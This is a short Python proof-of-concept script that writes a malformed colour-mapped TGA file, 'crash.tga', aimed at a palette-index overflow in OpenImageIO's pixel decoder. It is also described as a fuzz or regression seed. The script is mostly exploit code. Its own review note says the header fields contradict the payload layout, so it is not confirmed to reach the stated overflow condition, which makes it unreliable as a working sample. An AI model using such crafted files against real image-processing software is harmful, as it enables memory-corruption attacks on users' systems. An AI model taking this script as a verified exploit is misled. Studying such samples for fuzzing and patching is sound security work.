import struct
# Create a malicious TGA file to trigger the overflow
# TGA Header: ID length(1), Color map type(1), Image type(1)
# Color map spec(5), Image spec(10)
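# The condition this PoC targets is k=0xFFFFFFFC together with palbytespp=4.
# This is a simplified PoC structure demonstrating the concept; the field values
# written below are not confirmed to reach that condition in a real decoder.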
def generate_malicious_tga(filename):
    """Write a small malformed colour-mapped TGA sample to *filename*.

    The file is meant as a regression/fuzz seed for the palette-index
    handling in OpenImageIO's ``decode_pixel``. Layout, in write order:

    * 18-byte header: ID length 0, colour map type 1, image type 1
      (uncompressed, colour-mapped); colour map spec with first index 0,
      256 entries, entry size field 8; image spec with origin (0, 0),
      1x1 pixels, pixel depth 8, descriptor 0.
    * 1024 zero bytes of colour map data.
    * 4 bytes holding 0xFFFFFFFC in little-endian order as the pixel index.

    NOTE(review): the sample is internally inconsistent. The header declares
    an entry size of 8 and a pixel depth of 8, while the data that follows is
    sized for 4-byte palette entries and a 4-byte index. A reader that takes
    one byte per index sees 0xFC, so this file is not confirmed to reach the
    k=0xFFFFFFFC / palbytespp=4 condition; treat it as an unverified sample.

    For the decoder side, the relevant check is that a palette index is
    validated against the declared colour map length before any byte offset
    is derived from it, and that a colour map payload which disagrees with
    the header is rejected.

    Args:
        filename: Path of the file to create; an existing file is overwritten.
    """
    # Header prefix: ID length, colour map type, image type.
    id_and_types = struct.pack('<BBB', 0, 1, 1)
    # Colour map spec: first entry index, number of entries, entry size field.
    palette_spec = struct.pack('<HHB', 0, 256, 8)
    # Image spec: x origin, y origin, width, height, pixel depth, descriptor.
    cols, rows = 1, 1
    geometry = struct.pack('<HHHHBB', 0, 0, cols, rows, 8, 0)

    # Placeholder palette: 256 entries at 4 bytes each, all zero.
    palette_bytes = bytes(256 * 4)
    # Single pixel index, stored as a 32-bit little-endian value.
    pixel_index = (0xFFFFFFFC).to_bytes(4, 'little')

    with open(filename, 'wb') as out:
        out.write(id_and_types + palette_spec + geometry)
        out.write(palette_bytes)
        out.write(pixel_index)
if __name__ == "__main__":
    # Script entry point: write the sample into the current working directory
    # under a fixed name, then report where it went.
    generate_malicious_tga('crash.tga')
    print('Malicious TGA file generated: crash.tga')